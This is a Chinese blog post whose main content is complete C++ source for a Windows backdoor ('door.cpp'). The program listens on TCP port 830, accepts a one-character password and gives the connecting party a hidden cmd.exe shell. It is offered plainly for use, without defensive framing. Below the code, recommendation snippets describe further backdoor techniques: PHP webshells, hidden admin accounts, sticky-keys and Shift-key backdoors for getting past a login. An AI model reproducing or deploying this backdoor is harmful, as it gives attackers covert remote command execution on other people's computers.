cmd后门

最新推荐文章于 2024-03-14 14:58:18 发布
最新推荐文章于 2024-03-14 14:58:18 发布
阅读量1k 收藏
点赞数
分类专栏: c++ 
// door.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
 
 
#include <stdio.h>
 
#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib,"Ws2_32")

void door();
int main(int argc, char* argv[])
{ 
	door();
	return 0;
}

int port=830;
char pass[] = "j";
char g_helpmess[] = ""
"?	--help\r\n"
"shell	--get cmd shell\r\nquit	--quit,can connect again\r\nexit	--backdoor exit\r\n";

int cmdshell(SOCKET clientFD)
{
	STARTUPINFO si;
	ZeroMemory(&si,sizeof(si));
	si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = si.hStdOutput = si.hStdError = (void *)clientFD;
	char cmdLine[] = "cmd";
	PROCESS_INFORMATION ProcessInformation;
	int ret;
 
	ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
	WaitForSingleObject(ProcessInformation.hProcess, INFINITE);
	TerminateProcess(ProcessInformation.hProcess, 0);
	CloseHandle(ProcessInformation.hProcess);

	return 1;
}
void door()
{
	//	bool statulogin=false;
	bool passok=false;
	WSADATA ws;
	SOCKET listenFD;
	char Buff[1024],cmd[1024];
	int ret;
	unsigned long lBytesRead;
	WSAStartup(MAKEWORD(2,2),&ws);	 
	//建立socket
	//listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	listenFD = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
 
	struct sockaddr_in server;
	server.sin_family = AF_INET;
	server.sin_port = htons(port);
	server.sin_addr.s_addr=ADDR_ANY;
	ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
	ret=listen(listenFD,1);
	 
	int iAddrSize = sizeof(server);
ag:
	SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);	

	//	send(clientFD,"",sizeof(""),0);
	while(1)
	{

		ZeroMemory(cmd,1024); 
		lBytesRead = 0;

 
		while(lBytesRead<256)
		{ 
			if(recv(clientFD,Buff,1,0)==SOCKET_ERROR)
			{
				closesocket(clientFD); 
				goto ag;
			}
			cmd[lBytesRead]=Buff[0]; 
			if(Buff[0]==0xa || Buff[0]==0xd) 
			{ 
				cmd[lBytesRead]=0; 
				break; 
			} 
			lBytesRead++; 
		} 
		//判断密码 
		if(strcmp(cmd,pass) == 0 ){ passok=true;}
		if(passok==true)
		{}
		else
		{ 
			closesocket(clientFD);
			goto ag;
		} //如果密码错误就断开
		//帮助信息
		if(strcmp(cmd,"?") == 0 && passok==true)
		{
			send(clientFD,g_helpmess,sizeof(g_helpmess),0);
		}
		//得到cmd shell
		if(strcmp(cmd,"shell")==0 && passok==true)
		{
			cmdshell(clientFD);
			send(clientFD,"Shell OK\n\r",sizeof("Shell OK\n\r"),0);
		}
		//退出木马,还可再连接
		if(strcmp(cmd,"quit")==0 &&  passok==true)
		{
			passok=false;
			closesocket(clientFD);
			goto ag;
		}
		//木马退出程序
		if(strcmp(cmd,"exit")==0 &&  passok==true)
		{
			closesocket(clientFD);
			closesocket(listenFD);

			goto end;
		}

		if(strlen(cmd) &&  passok==true) 
			send(clientFD,"shell>",sizeof("shell>"),0);

		Sleep(10);
	}
end:
	;
	//	return 0;
}

smwhotjay
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php域名追踪后门_常用php后门网马总结分析
weixin_34611130的博客
03-08 318
php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?php后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, ...
windows创建隐藏用户及后门
diaobusi的博客
06-20 2361
在Windows操作系统中,用户系统是用于管理和控制用户访问、权限和资源的一组功能和机制。以下是Windows用户系统的一些关键概念和组成部分:用户账户:Windows用户系统基于用户账户来管理用户访问和权限。每个用户都必须拥有一个唯一的用户账户,用户账户包含了用户的登录名和密码等信息。用户账户可以是本地账户(仅限于本地计算机)或域账户(属于域控制器管理的网络域)。
简单的cmd双管道后门
qq_42124567的博客
05-16 990
这几天学习了一下windows后门编程,并尝试着写了一个简单的cmd双管道后门。主要涉及到了socket通信和管道。 后门分为主动连接型和反向连接型,区别就是一个是后门程序作为服务端,另一个是后门程序作为客户端。 双管道的原因:cmd执行结果写入管道1写句柄,后门从管道1读句柄读取cmd执行结果,后门接受到的命令通过管道2的写句柄写入,cmd通过管道2的读句柄读出。 多的不说,直接上代码,我觉得注...
使用管道实现简单的CMD后门程序,并转化为Shellcode
Birldlee的博客
12-26 2760
实现一个能实现远程控制功能的shellcode,控制被攻击的主机。
Windows粘滞键后门
最新发布
carmi的博客
03-14 739
此时假如该设备设置了这种粘滞键的话就可以通过调出cmd窗口(管理员状态)进行用户的创建,并将该用户归入到管理员组当中,就可以实现没有用户信息即可登入设备的操作——粘滞键后门。在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应用程序(系统进程)。出现这种情况的原因是:由于刚刚已经将权限给到管理员,但管理员的权限始终未变化,所以还是不能修改文件名称(提高)。右键cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限。
黑客编程入门 之 后门编写初探
Steve·Curcy
09-05 1382
后门编写初探基本的执行DOS命令木马所需函数代码实现零管道木马和反弹木马零管道反弹木马木马功能的增强和扩展模块打造初步后门cmd shell 的自由切换模板 = 木马普通木马的自启动启动文件夹注册表启动其他 基本的执行DOS命令木马   我们现在先考虑最早的木马:将目标主机作为服务器,打开一个端口进行监听,攻击者就可以通过telnet进行连接。   DOS功能是木马必须拥有的最小的功能模块。那么我们现在的任务就是:1. 开创 cmd.exe 进程;2. 把 cmd 进程和客户的输入连起来。那么接下来介绍一下
cmd后门cmd后门
01-03
放大镜建用户 放大镜建用户 放大镜建用户
服务器后门(cmd使用)
03-24
以下是对“服务器后门(cmd使用)”这一主题的详细解析: ### 1. 服务器后门的基本概念 服务器后门是指在网络系统中,绕过常规安全机制的秘密访问路径。这些后门可以是软件漏洞、恶意代码、隐藏账户或其他形式的安全...
VC远程CMD,设置后门
04-14
在主机上设置一个50000端口的后门,本地主机可通过telnet获得远程主机的cmd
清凉CMD反向连接后门
01-07
在IT安全领域,"清凉CMD反向连接后门"是一个具有特定含义的概念。这个标题暗示了一个利用CMD(命令提示符)实现的恶意软件,它能够建立一个反向连接,允许攻击者从远程控制受感染的系统。下面我们将深入探讨这个话题...
upp_T-CMD.rar_cmd
09-14
标题 "upp_T-CMD.rar_cmd" 提到的是一个与 Delphi 开发相关的源代码包,主要包含一个名为 "T-Cmd" 的项目。这个项目是一个用 C++ 编写的后门程序,它允许远程访问和控制目标计算机。尽管后门程序在非法活动中被滥用...
C语言,后门程序,C语言CGI编程二 - 编写cmd后门
weixin_39726044的博客
05-18 508
里面该说的都说的很清楚。今天我们来用它来做一个后门,将后门放在有执行cgi权限的服务器上,通过客户端POST命令到cgi上并执行,达到控制服务器的目的。首先下载官网上的压缩包。解压里面有cgic.c和cgic.h,这是我们需要用到的文件。(另外两个c文件是演示用的,还有一个makefile是linux下使用的,在VS2010中我没有用到它)从官方的文档和下载的cgictest.c可以看到,这个库里...
一个简单的CMDSHELL后门
03-27 1191
一个简单的CMDSHELL后门文章作者: 小马/SmallHorse [E.S.T VIP](这个E.S.T VIP写不写是无所谓的)信息来源: 邪恶八进制 中国   最近闲着无聊,自己琢磨着写了个简单的CMDSHELL后门。同时也避免了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的相关文章。从中学到了很多知识。  程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来
window cmd ipc$ 后门
一个草根敲键盘的故事
11-29 544
NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]] [/USER:[domainname\]username] [/USER:[dotted domain name\]username] [/USER:[username@dotted domain n...
一个Shift的后门程序,可以让你可以进入你不知道密码的电脑
热门推荐
杨启盛的博客
08-01 2万+
1.前提 你可以在平时亲身接触状态电脑,哪怕是在电脑主人不在的时候(虽然主人不在,或者关机了,进入电脑是要密码的)。 2.原理 利用电脑连续按5次Shift会触发粘滞键,它会运行c:\winows\system32\setchx.exe 3.Shift后门程序编写 将下面的内容保存成.bat后缀的文件,文件名你可以自己取,取的吸引人一点,他们就会点了,你懂的! 为了让别人不知道你这个程
一个简单的CMDShell后门
小马[SmallHorse] 偶尔过来发发牢骚。。。
09-14 1390
很久以前写的一段小代码,实现一个简单的CMDShell后门。贴出来再回味一下!注释少了些,见谅!呵呵!程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来连接。连接可以使用nc。用法:smallhorse [-p port] -p参数用于设置自己的端口在vc++6.0 WIN2003下编译通过#includewinsock2.h>#include stdio.h>#pr
技术讨论关于零管道CMD后门
冷风
08-08 2812
冷风草草细说下零管道 关注.........μρ2ц清风这个不光过卡巴了,,,基本上所有主动防御都过!!包口SSM,微点,,,夕草hot patching.μρ2ц清风对啊..冷风用socket直接替换输入输出的handle,可以实现零管道sulwan颠覆核心编程啊.μρ2ц清风反正我是用零管道的..幻影    si.hStdInput=hrp1;     si.hStdOutput=hwp2;幻
windows下后门技术(netcat篇)
d_0xff的博客
05-25 1万+
由于这次ctf的失利,来补习一下知识吧!windows下后门环境 win7 nc.exe假设用administrator登陆用nc创建了一个后门,Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题便携式工具(Portable Applications)便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一
CMD编程基础与实战应用
在网络安全领域,批处理文件也被广泛用于入侵技术中,如自动执行系统更新(打补丁)、批量植入后门程序等,但这些高级应用通常需要对命令的组合和利用有深入的理解。 一、简单批处理内部命令详解 1. Echo命令:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值